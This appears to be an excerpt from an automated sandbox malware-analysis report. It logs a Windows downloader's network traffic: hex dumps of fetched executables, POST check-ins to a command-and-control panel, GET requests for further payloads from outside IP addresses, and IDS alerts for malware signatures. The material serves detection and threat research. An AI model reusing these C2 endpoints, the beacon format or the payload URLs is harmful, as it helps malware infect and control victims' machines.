00 00 00 d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 ba 18 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 c8 07 00 00 00 c0 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 63 76 30 00 00 00 00 00 74 61 09 00 00 d0 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 63 76 31 00 00 00 00 00 e0 02 00 00 00 40 23 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 63 76 32 00 00 00 00 00 d0 25 1c 00 00 50 23 00 00 26 1c 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Thu, 13 Mar 2025 07:08:40 GMTContent-Type: application/octet-streamContent-Length: 590336Last-Modified: Tue, 11 Mar 2025 14:08:05 GMTConnection: keep-aliveETag: "67d043c5-90200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 08 00 4b 3f d0 67 00 00 00 00 00 00 00 00 f0 00 23 00 0b 02 09 00 00 5c 00 00 00 42 01 00 00 00 00 00 53 af 07 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 b0 0b 00 00 04 00 00 02 14 09 00 02 00 00 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d0 22 04 00 50 00 00 00 00 a0 0a 00 d0 03 01 00 d0 90 0a 00 9c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 02 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f1 5a 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e0 21 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 20 00 00 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 f8 04 00 00 00 d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 73 73 30 00 00 00 00 00 1b a3 01 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 73 73 31 00 00 00 00 00 60 00 00 00 00 90 02 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 73 73 32 00 00 00 00 00 6c f7 07 00 00 a0 02 00 00 f8 07 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 68 2e 72 73 72 63 00 00 00 00 10 01 00 00 a0 0a 00 00 04 01 00 00 fe 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 13 Mar 2025 07:08:42 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 12 Mar 2025 14:12:02 GMTETag: "8ec000-63025ca1b4e20"Accept-Ranges: bytesContent-Length: 9355264Content-Type: application/x-msdos-programData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 36 34 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 03 00 c7 90 d1 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 08 00 00 c0 8e 00 00 10 00 00 00 d0 21 00 30 86 b0 00 00 e0 21 00 00 00 40 00 00 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 b0 00 00 04 00 00 00 00 00 00 03 00 60 81 00 00 10 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 40 16 00 6c 00 00 00 b4 a3 b0 00 94 01 00 00 00 a0 b0 00 b4 03 00 00 00 80 17 00 0c 32 01 00 00 00 00 00 00 00 00 00 48 a5 b0 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 92 b0 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 16 00 92 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 d0 21 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 c0 8e 00 00 e0 21 00 00 b6 8e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 10 00 00 00 a0 b0 00 00 06 00 00 00 ba 8e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 13 Mar 2025 07:08:55 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 12 Mar 2025 14:12:55 GMTETag: "85d600-63025cd3e16b2"Accept-Ranges: bytesContent-Length: 8771072Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0f 00 00 00 00 00 00 74 7f 00 72 20 00 00 f0 00 22 00 0b 02 03 00 00 c4 29 00 00 08 04 00 00 00 00 00 20 45 07 00 00 10 00 00 00 00 40 00 00 00 00 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 60 8b 00 00 06 00 00 00 00 00 00 02 00 60 81 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 10 84 00 3e 05 00 00 00 00 00 00 00 00 00 00 00 c0 5d 00 84 f0 00 00 00 00 00 00 00 00 00 00 00 20 84 00 1c c7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 d3 54 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6e c2 29 00 00 10 00 00 00 c4 29 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c8 e0 2a 00 00 e0 29 00 00 e2 2a 00 00 ca 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 f0 08 00 00 d0 54 00 00 08 04 00 00 ac 54 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 84 f0 00 00 00 c0 5d 00 00 f2 00 00 00 b4 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 78 64 61 74 61 00 00 b4 00 00 00 00 c0 5e 00 00 02 00 00 00 a6 59 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2f 34 00 00 00 00 00 00 4c 01 00 00 00 d0 5e 00 00 02 00 00 00 a8 59 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 31 39 00 00 00 00 00 25 62 07 00 00 e0 5e 00 00 64 07 00 00 aa 59 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 32 00 00 00 00 00 22 87 01 00 00 50 66 00 00 88 01 00 00 0e 61 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 36 00 00 00 00 00 30 00 00 00 00 e0 67 00 00 02 00 00 00 96 62 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 36 35 00 00 00 00 00 b5 bc 0f 00 00 f0 67 00 00 be 0f 00 00 98 62 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 37 38 00 00 00 00 00 f3 7a 09 00 00 b0 77 00 00 7c 09 00 00 56 72 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 30 00 00 00 00 00 5a d2 02 00 00 30 81 00 00 d4 02 00 00 d2 7b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2e 69 64 61 74 61 00 00 3e 05 00 00 00 10 84 00 00 06 00 00 00 a6 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 13 Mar 2025 07:09:09 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 12 Mar 2025 15:51:15 GMTETag: "275c0-630272ce301b3"Accept-Ranges: bytesContent-Length: 161216Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 32 1f 9c 7d 76 7e f2 2e 76 7e f2 2e 76 7e f2 2e 24 0b f6 2f 7a 7e f2 2e 24 0b f1 2f 7c 7e f2 2e 24 0b f7 2f 3b 7e f2 2e 7f 06 61 2e 66 7e f2 2e a5 0c f3 2f 7f 7e f2 2e 76 7e f3 2e d4 7e f2 2e b2 0b fb 2f 7c 7e f2 2e b2 0b f0 2f 77 7e f2 2e 52 69 63 68 76 7e f2 2e 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 7e ef 1c 64 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 1d 00 7e 01 00 00 c0 00 00 00 00 00 00 50 37 01 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 02 00 00 04 00 00 00 00 00 00 02 00 60 c1 00 00 18 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c 14 02 00 04 01 00 00 00 80 02 00 60 05 00 00 00 50 02 00 28 14 00 00 00 00 00 00 00 00 00 00 00 90 02 00 18 03 00 00 a0 df 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 e1 01 00 28 00 00 00 00 e0 01 00 38 01 00 00 00 00 00 00 00 00 00 00 00 90 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ec 7c 01 00 00 10 00 00 00 7e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ca 92 00 00 00 90 01 00 00 94 00 00 00 82 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 f8 14 00 00 00 30 02 00 00 0a 00 00 00 16 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 28 14 00 00 00 50 02 00 00 16 00 00 00 20 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 f4 00 00 00 00 70 02 00 00 02 00 00 00 36 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 60 05 00 00 00 80 02 00 00 06 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 18 03 00 00 00 90 02 00 00 04 00 00 00 3e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 37 37 32 42 38 35 45 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A79B52772B85E82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: GET /files/6142491850/s7MG2VL.exe HTTP/1.1Host: 176.113.115.7
                          Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 37 31 33 30 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10171300101&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /files/7033027882/ZqkKpwG.exe HTTP/1.1Host: 176.113.115.7
                          Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 38 31 39 38 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10181980101&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /files/8061344923/eAzoDbY.exe HTTP/1.1Host: 176.113.115.7
                          Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 38 34 33 34 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10184340101&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /app/8sb9w_003.exe HTTP/1.1Host: 107.174.192.179
                          Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 30 38 36 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10190860101&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /files/809453437/yo7qmvz.exe HTTP/1.1Host: 176.113.115.7
                          Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 31 32 33 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10191230101&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /files/1482809150/st22BJg.exe HTTP/1.1Host: 176.113.115.7
                          Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 31 34 37 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10191470101&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /files/6003232782/EZs3CZC.exe HTTP/1.1Host: 176.113.115.7
                          Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 31 34 39 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10191490101&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /files/2043702969/dx3hXS1.exe HTTP/1.1Host: 176.113.115.7
                          Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 32 32 37 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10192270101&unit=246122658369
                          Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
                          Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
                          Source: Joe Sandbox ViewIP Address: 176.113.115.7 176.113.115.7
                          Source: Joe Sandbox ViewASN Name: SELECTELRU SELECTELRU
                          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:61660 -> 176.113.115.7:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:61662 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:61663 -> 176.113.115.7:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:61664 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:61665 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:61666 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:61669 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:61671 -> 176.113.115.7:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:61670 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:61673 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:61674 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:61678 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:61682 -> 107.174.192.179:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:61675 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:61681 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:61680 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:61683 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:61684 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:61685 -> 104.26.9.202:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:61686 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:61689 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:61692 -> 176.113.115.7:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:61690 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:61688 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:61693 -> 104.26.9.202:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:61694 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:61697 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:61700 -> 176.113.115.7:80
                          Source: Network trafficSuricata IDS: 2001046 - Severity 3 - ET MALWARE UPX compressed file download possible malware : 176.113.115.7:80 -> 192.168.2.6:61700
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:61695 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:61701 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:61702 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:61731 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:61732 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:61734 -> 188.114.96.3:443
